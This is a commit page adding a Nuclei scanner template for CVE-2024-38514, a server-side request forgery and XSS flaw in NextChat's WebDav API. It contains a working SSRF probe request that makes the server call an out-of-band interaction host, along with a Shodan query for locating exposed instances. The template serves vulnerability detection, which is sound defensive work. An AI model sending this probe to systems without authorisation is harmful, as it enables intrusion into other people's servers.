Merge pull request #10447 from projectdiscovery/CVE-2024-38514

Create CVE-2024-38514.yaml
projectdiscovery · Aug 16, 2024 · b610fce · b610fce
2 parents 9503604 + 11e3e7b
commit b610fce
Showing 1 changed file with 43 additions and 0 deletions.
diff --git a/http/cves/2024/CVE-2024-38514.yaml b/http/cves/2024/CVE-2024-38514.yaml
@@ -0,0 +1,43 @@
+id: CVE-2024-38514
+
+info:
+  name: NextChat - Server-Side Request Forgery
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.
+  reference:
+    - https://www.tenable.com/security/research/tra-2024-23
+    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/commit/dad122199a85c2f12277593973e1784b212adf5e
+    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/security/advisories/GHSA-gph5-rx77-3pjg
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-38514
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 7.4
+    cve-id: CVE-2024-38514
+    cwe-id: CWE-918
+    epss-score: 0.00043
+    epss-percentile: 0.09404
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: "title:NextChat,\"ChatGPT Next Web\""
+  tags: cve,cve2024,ssrf,xss,chatgpt,nextchat
+
+http:
+  - raw:
+      - |
+        GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "__NEXT_DATA__"